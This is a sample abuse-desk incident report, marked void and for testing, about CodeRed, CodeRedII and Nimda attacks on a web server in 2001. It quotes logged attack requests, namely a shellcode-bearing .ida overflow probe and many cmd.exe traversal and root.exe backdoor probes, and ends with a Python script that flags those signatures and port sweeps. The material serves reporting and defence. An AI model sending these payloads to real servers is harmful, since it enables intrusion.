================================================================
This example incident report is void - for testing purposes only
================================================================

Subject: CodeRedII and Nimda Attack from Originating_Country [incidentID#666]
Date: Fri, 05 Oct 2001 06:06:06 +0200
From: Bastard Operator From Hell
Organization: Operators Unlimited
To: Abuse, cert, Foreign Hostmaster, Everybody And Their Dog

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

L.S.

Since Thursday October 4 we have experienced CodeRed, CodeRedII and Nimda attacks from the network 10.11.12.0/24. Following these attacks there have been numerous attempts to access vulnerabilities created by CodeRed, CodeRedII and Nimda. Some of these attacks have been successful and we require your assistance in tracking down the responsible parties.

All attacks from your network have been aimed toward our public WWW server located at IP 172.22.10.12. Systems performing the attack on your network are: 10.11.12.13, 10.11.12.29 and 10.11.12.194.

Our system (172.22.10.12) has been infected with CodeRed, CodeRedII and Nimda. We have limited network access to the system by installing a firewall. A sample of the logfiles from the firewall is included below.

The following relevant data has been collected from our WWW server:

10.11.12.194 - - [04/Oct/2001:22:15:54 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 420
10.11.12.13 - - [04/Oct/2001:22:24:48 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 373
10.11.12.29 - - [04/Oct/2001:22:35:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 373
10.11.12.194 - - [04/Oct/2001:23:43:30 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 270
10.11.12.194 - - [04/Oct/2001:23:43:32 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 268
10.11.12.194 - - [04/Oct/2001:23:43:33 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278
10.11.12.194 - - [04/Oct/2001:23:43:44 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278
10.11.12.194 - - [04/Oct/2001:23:44:06 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292
10.11.12.194 - - [04/Oct/2001:23:44:11 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309
10.11.12.194 - - [04/Oct/2001:23:44:13 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309
10.11.12.194 - - [04/Oct/2001:23:44:14 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 325
10.11.12.194 - - [04/Oct/2001:23:44:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.194 - - [04/Oct/2001:23:44:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309
10.11.12.194 - - [04/Oct/2001:23:44:22 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.194 - - [04/Oct/2001:23:44:23 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.194 - - [04/Oct/2001:23:44:25 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 283
10.11.12.194 - - [04/Oct/2001:23:44:27 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 293
10.11.12.194 - - [04/Oct/2001:23:44:28 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292
10.11.12.194 - - [04/Oct/2001:23:44:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292
10.11.12.13 - - [04/Oct/2001:22:41:27 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 270
10.11.12.13 - - [04/Oct/2001:22:41:28 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 268
10.11.12.13 - - [04/Oct/2001:22:41:28 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278
10.11.12.13 - - [04/Oct/2001:22:41:29 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278
10.11.12.13 - - [04/Oct/2001:22:41:29 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292
10.11.12.13 - - [04/Oct/2001:22:41:30 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309
10.11.12.13 - - [04/Oct/2001:22:41:30 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309
10.11.12.13 - - [04/Oct/2001:22:41:31 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 325
10.11.12.13 - - [04/Oct/2001:22:41:31 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.13 - - [04/Oct/2001:22:41:32 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.13 - - [04/Oct/2001:22:41:32 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.13 - - [04/Oct/2001:22:41:33 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
10.11.12.13 - - [04/Oct/2001:22:41:33 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 293
10.11.12.13 - - [04/Oct/2001:22:41:34 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 293
10.11.12.13 - - [04/Oct/2001:22:41:34 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292
10.11.12.13 - - [04/Oct/2001:22:41:35 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292

Firewall logs the following:

Oct 05 01:02:10 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5868 DF PROTO=TCP SPT=12567 DPT=21 WINDOW=44032 SYN URGP=0
Oct 05 01:02:11 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5871 DF PROTO=TCP SPT=12567 DPT=22 WINDOW=44032 SYN URGP=0
Oct 05 01:02:12 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5899 DF PROTO=TCP SPT=12567 DPT=23 WINDOW=44032 SYN URGP=0
Oct 05 01:02:13 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5910 DF PROTO=TCP SPT=12567 DPT=110 WINDOW=44032 SYN URGP=0

Regards,

Kalle Anka
BOFH-CERT
+991-2-345-6789

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0

iQA/AwUBOqkEjpoxvmlLq0UAUIDkleookdlliwoslc,iekdTF4AnAym
EKiaPFGn79n6XNPds2L007uL
=fAnW
-----END PGP SIGNATURE-----
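Added example, not part of the report above: a small Python triage script that applies the two detections the report relies on, worm-signature matching on the WWW-server access log (the /default.ida probe, root.exe, and the cmd.exe traversal variants) and a port-sweep check on the firewall Deny lines. The sample log lines are constructed copies of the report's entries with the CodeRed filler shortened; 192.0.2.7 is a constructed benign client, and the three-port sweep threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed samples modelled on the report's logs (CodeRed filler run shortened).
ACCESS_LOG = """\
10.11.12.194 - - [04/Oct/2001:22:15:54 +0200] "GET /default.ida?NNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 400 420
10.11.12.194 - - [04/Oct/2001:23:43:30 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 270
10.11.12.13 - - [04/Oct/2001:22:41:29 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292
10.11.12.13 - - [04/Oct/2001:22:41:32 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291
192.0.2.7 - - [04/Oct/2001:22:50:00 +0200] "GET /index.html HTTP/1.0" 200 1043
"""
FIREWALL_LOG = """\
Oct 05 01:02:10 firewall kernel: Deny In=eth2 OUT= SRC=10.11.12.194 DST=172.22.10.12 PROTO=TCP SPT=12567 DPT=21 SYN
Oct 05 01:02:11 firewall kernel: Deny In=eth2 OUT= SRC=10.11.12.194 DST=172.22.10.12 PROTO=TCP SPT=12567 DPT=22 SYN
Oct 05 01:02:12 firewall kernel: Deny In=eth2 OUT= SRC=10.11.12.194 DST=172.22.10.12 PROTO=TCP SPT=12567 DPT=23 SYN
"""
# Common Log Format: client ident user [timestamp] "request" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')
FW = re.compile(r'Deny .*?SRC=(\S+) .*?DPT=(\d+).*SYN')

def classify_request(path):
    """Return the worm family whose request signature matches path, else None."""
    p = path.lower()
    if p.startswith('/default.ida?') and '%u' in p:
        return 'CodeRed/CodeRedII'          # .ida buffer-overflow probe
    if 'root.exe' in p:
        return 'Nimda (root.exe backdoor)'  # copy of cmd.exe left behind by CodeRedII
    if 'cmd.exe' in p and ('..%' in p or '/c/winnt' in p or '/d/winnt' in p):
        return 'Nimda (cmd.exe traversal)'  # traversal / Unicode-decode probe
    return None

def scan_access_log(text):
    """Group matching requests by source address as (family, HTTP status) pairs."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = CLF.match(line)
        family = classify_request(m.group(2)) if m else None
        if family:
            hits[m.group(1)].append((family, int(m.group(3))))
    return dict(hits)

def scan_firewall_log(text, min_ports=3):
    """Flag sources whose denied SYNs touched at least min_ports distinct ports (sweep)."""
    ports = defaultdict(set)
    for line in text.splitlines():
        m = FW.search(line)
        if m:
            ports[m.group(1)].add(int(m.group(2)))
    return {src: sorted(p) for src, p in ports.items() if len(p) >= min_ports}
```

The HTTP status recorded with each hit is worth keeping: it is what tells an abuse desk whether a probe was merely received (400/404) or answered by something on the server.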